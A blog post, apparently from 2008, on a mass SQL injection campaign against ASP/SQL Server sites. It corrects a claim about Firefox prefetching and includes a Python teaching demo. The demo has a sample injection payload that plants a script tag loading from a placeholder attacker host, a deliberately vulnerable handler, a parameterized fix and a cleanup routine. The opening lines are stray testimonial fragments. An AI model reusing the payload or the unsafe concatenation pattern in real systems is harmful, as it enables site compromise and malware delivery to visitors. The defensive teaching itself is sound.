
Hence I think, with what is written, this is the best!! Many thanks.

7-5-2008

I must give credit here: among all the scares on the internet out there today, Giorgio has assured me that the configurations that are set at this site will defend you and your computer. Thanks, That Planet web security. Giorgio M!

SANS is reporting a new wave of the automated mass SQL injection attack against MS ASP + MS SQL Server web sites.

To my surprise and disappointment, the first commenter on the SANS diary entry wrote:

If you’re using Firefox, exploited sites may reach out and “touch” you even before you look at cached pages, unless you’ve manually disabled “network.prefetch-next” in “about:config”. Check out http://www.google.com/help/features.html#prefetch for more information.

Such a statement is misleading, since no code gets executed when a page is prefetched: Firefox only fetches the raw bytes and stores them in the cache for faster access. The prefetched document is not parsed or rendered, so none of its script tags run, and the cached copy cannot do any harm until you actually open the page (at which point the usual protections apply). The prefetch request itself is an ordinary GET, so the site sees a hit, but that is all.

Furthermore, if you’re using Firefox you’re immune to exploits targeting Internet Explorer vulnerabilities, which are a very common payload, and if you’re running NoScript you won’t be “touched” by any part of this attack: the initial malicious script in the chain is prevented from loading, and even if it weren’t, the plugin-based exploitation attempts would be blocked anyway.

On a side note, I’ve updated the post-mortem cleanup SQL script that I attached, with no guarantee, to my previous post for site administrators, after reader Scott reported that it was not working properly. It’s now debugged and “tested” on SQL Server 2005 (it should work on other versions as well).

But again: if you own a web site, a serious code review to eliminate SQL injection opportunities is mandatory, unless you want your site to get reinfected in the next round. It’s happening right now…
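To make the code-review point concrete, here is an added example (not code from the original post, and not the author’s cleanup script) showing the class of bug this attack exploits, the fix, and a post-mortem check. It is written in Python against an in-memory SQLite table rather than Classic ASP and SQL Server, so it runs anywhere; the table name `articles`, the payload text and the host `attacker.example` are constructed placeholders, not the real attack payload, which arrived hex-encoded inside a DECLARE/EXEC block.

```python
import sqlite3

# Constructed stand-in for the mass-injection payload (the real one arrived
# hex-encoded inside a DECLARE/EXEC block and used SQL Server's '+' for string
# concatenation; SQLite uses '||'). A numeric id parameter is terminated with
# ';' and an UPDATE is stacked on that appends a script tag to every row.
# attacker.example is a placeholder host.
INJECTED_TAG = '<script src="http://attacker.example/b.js"></script>'
PAYLOAD = "1;UPDATE articles SET body = body || '" + INJECTED_TAG + "'--"


def make_db():
    """In-memory table standing in for a site's content table (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE articles (id INTEGER PRIMARY KEY, body TEXT);"
        "INSERT INTO articles VALUES (1, 'first post');"
        "INSERT INTO articles VALUES (2, 'second post');"
    )
    return conn


def lookup_vulnerable(conn, article_id):
    """The bug: the id is concatenated straight into the query text.

    SQL Server executes stacked statements by default; sqlite3's execute()
    refuses them, so executescript() is used here to reproduce that behaviour.
    Returns the SQL text that actually ran so the injected statement is visible.
    """
    sql = "SELECT body FROM articles WHERE id = " + article_id
    conn.executescript(sql)
    return sql


def is_valid_id(value):
    """First layer of defence: an id must be a plain non-negative integer."""
    return value.isdigit()


def lookup_safe(conn, article_id):
    """The fix: bind the value as a parameter.

    The payload reaches the engine as data and is never parsed as SQL, so the
    stacked UPDATE is inert and a non-numeric id simply matches no row.
    """
    cur = conn.execute("SELECT body FROM articles WHERE id = ?", (article_id,))
    return [row[0] for row in cur.fetchall()]


def count_tainted(conn, marker):
    """Post-mortem check: how many rows still carry the injected tag."""
    cur = conn.execute(
        "SELECT COUNT(*) FROM articles WHERE instr(body, ?) > 0", (marker,)
    )
    return cur.fetchone()[0]


def cleanup(conn, marker):
    """Post-mortem repair: strip the tag from every affected row.

    Illustrative only, not the cleanup script the post refers to. Returns the
    number of rows changed; rerun the code review before trusting the result.
    """
    cur = conn.execute(
        "UPDATE articles SET body = replace(body, ?, '') WHERE instr(body, ?) > 0",
        (marker, marker),
    )
    conn.commit()
    return cur.rowcount


def demo():
    """Run the payload against both handlers and report what each produced."""
    conn = make_db()
    results = {}
    results["safe_rows_for_payload"] = lookup_safe(conn, PAYLOAD)
    results["tainted_after_safe"] = count_tainted(conn, INJECTED_TAG)
    results["sql_that_ran"] = lookup_vulnerable(conn, PAYLOAD)
    results["tainted_after_vulnerable"] = count_tainted(conn, INJECTED_TAG)
    results["rows_cleaned"] = cleanup(conn, INJECTED_TAG)
    results["tainted_after_cleanup"] = count_tainted(conn, INJECTED_TAG)
    results["safe_rows_for_1"] = lookup_safe(conn, "1")
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

Running it shows the parameterized handler returning no rows and leaving the table untouched, the concatenating handler executing the stacked UPDATE and tainting every row, and the cleanup restoring the original bodies. In a real site the handler should call `is_valid_id` first and then use a parameterized query; the cleanup only removes the symptom, which is why the post insists on the code review.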

Article Link: http://hackademix.net/2008/05/07/mass-attack-updates/
